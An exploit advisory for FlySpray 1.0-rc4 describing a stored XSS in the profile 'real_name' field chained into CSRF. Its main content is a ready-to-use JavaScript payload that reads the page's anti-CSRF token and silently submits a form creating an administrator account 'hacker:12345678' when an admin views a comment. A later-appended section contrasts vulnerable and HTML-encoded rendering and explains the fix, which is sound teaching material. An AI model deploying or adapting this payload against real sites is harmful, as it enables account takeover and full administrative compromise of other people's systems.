# Exploit Title: FlySpray 1.0-rc4 - Stored XSS to CSRF (add admin account)
# Date: 19/04/2017
# Exploit Author: Cyril Vallicari / HTTPCS / ZIWIT : https://www.openoffice.org
# Version: 1.0-rc4
# Tested on: Windows 7 x64 SP1 / Kali Linux

Description :

A stored cross-site scripting vulnerability has been discovered in FlySpray, which can be exploited by malicious people to conduct cross-site scripting attacks. Input passed via the 'real_name' parameter to '/index.php?do=myprofile' is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of the affected site.

The script is executed on the profile page AND on any page that allows the user to post a comment, so it fires whenever another user views one of the attacker's comments.

Because the injected script runs in the victim's browser on the site's own origin, it can read the anti-CSRF token out of the page and submit a form to create a new administrator account. The CSRF token does not help here: it only stops forged requests from other origins, not script that is already running on the site. The request to the admin area is only accepted for a user with admin rights, so the payload has to be viewed by an administrator.

Here's the script :

    // Read the anti-CSRF token that FlySpray embeds in the page's own forms.
    var tok = document.getElementsByName('csrftoken')[0].value;

    // Build a hidden copy of the "new user" admin form, filled in for the
    // attacker's account, with the stolen token attached.
    var txt = '<form method="POST" id="hacked_form" action="index.php?do=admin&area=newuser">';
    txt += '<input type="hidden" name="action" value="admin.newuser"/>';
    txt += '<input type="hidden" name="do" value="admin"/>';
    txt += '<input type="hidden" name="area" value="newuser"/>';
    txt += '<input type="hidden" name="user_name" value="hacker"/>';
    txt += '<input type="hidden" name="csrftoken" value="' + tok + '"/>';
    txt += '<input type="hidden" name="user_pass" value="12345678"/>';
    txt += '<input type="hidden" name="user_pass2" value="12345678"/>';
    txt += '<input type="hidden" name="real_name" value="root"/>';
    txt += '<input type="hidden" name="email_address" value="root@root.com"/>';
    txt += '<input type="hidden" name="verify_email_address" value="root@root.com"/>';
    txt += '<input type="hidden" name="jabber_id" value=""/>';
    txt += '<input type="hidden" name="notify_type" value="0"/>';
    txt += '<input type="hidden" name="time_zone" value="0"/>';
    // Group 1: the account is created in the admin group.
    txt += '<input type="hidden" name="group_in" value="1"/>';
    txt += '</form>';

    // Inject the form next to the page menu and submit it with the victim's session.
    var d1 = document.getElementById('menu');
    d1.insertAdjacentHTML('afterend', txt);
    document.getElementById("hacked_form").submit();

This will create a new admin account, hacker:12345678

POC video : https://www.youtube.com/watch?v=eCf9a0QpnPs

Patch : No patch yet
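The root cause is that the stored 'real_name' value reaches the HTML output without encoding. The following is an added example, not FlySpray's code (FlySpray is PHP; plain JavaScript is used here only so the comparison runs stand-alone in Node): a vulnerable rendering of the profile field next to a hardened one that HTML-encodes the value, fed a constructed payload of the same shape the advisory uses. The element names and the `containsScriptTag` check are illustrative assumptions, not FlySpray internals.

```javascript
// Added example (not FlySpray code): the stored real_name rendered without
// and with output encoding. JavaScript stands in for FlySpray's PHP templates.

// Constructed sample payload, same shape as the advisory's: script stored in
// the profile field that reads the CSRF token out of the page.
const storedRealName =
  '<script>var tok = document.getElementsByName("csrftoken")[0].value;</script>';

// Vulnerable rendering: the stored value is concatenated straight into HTML
// (illustrates what the advisory describes; element name is assumed).
function renderProfileVulnerable(realName) {
  return '<td class="real_name">' + realName + '</td>';
}

// Hardened rendering: encode the five characters that can break out of a text
// context before the value reaches the page (the same thing PHP's
// htmlspecialchars() with ENT_QUOTES does server-side).
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

function renderProfileHardened(realName) {
  return '<td class="real_name">' + escapeHtml(realName) + '</td>';
}

// Illustrative check, not an HTML parser: does the markup contain a script
// element the browser would execute?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}
```

With the vulnerable renderer the payload is emitted as a live `<script>` element; with the hardened one the same input becomes `&lt;script&gt;...` and is displayed as text. Note that the token-reading line in the payload is exactly why a CSRF token alone is no defence: any script on the same origin can read it, so the fix has to be output encoding, not a stronger token.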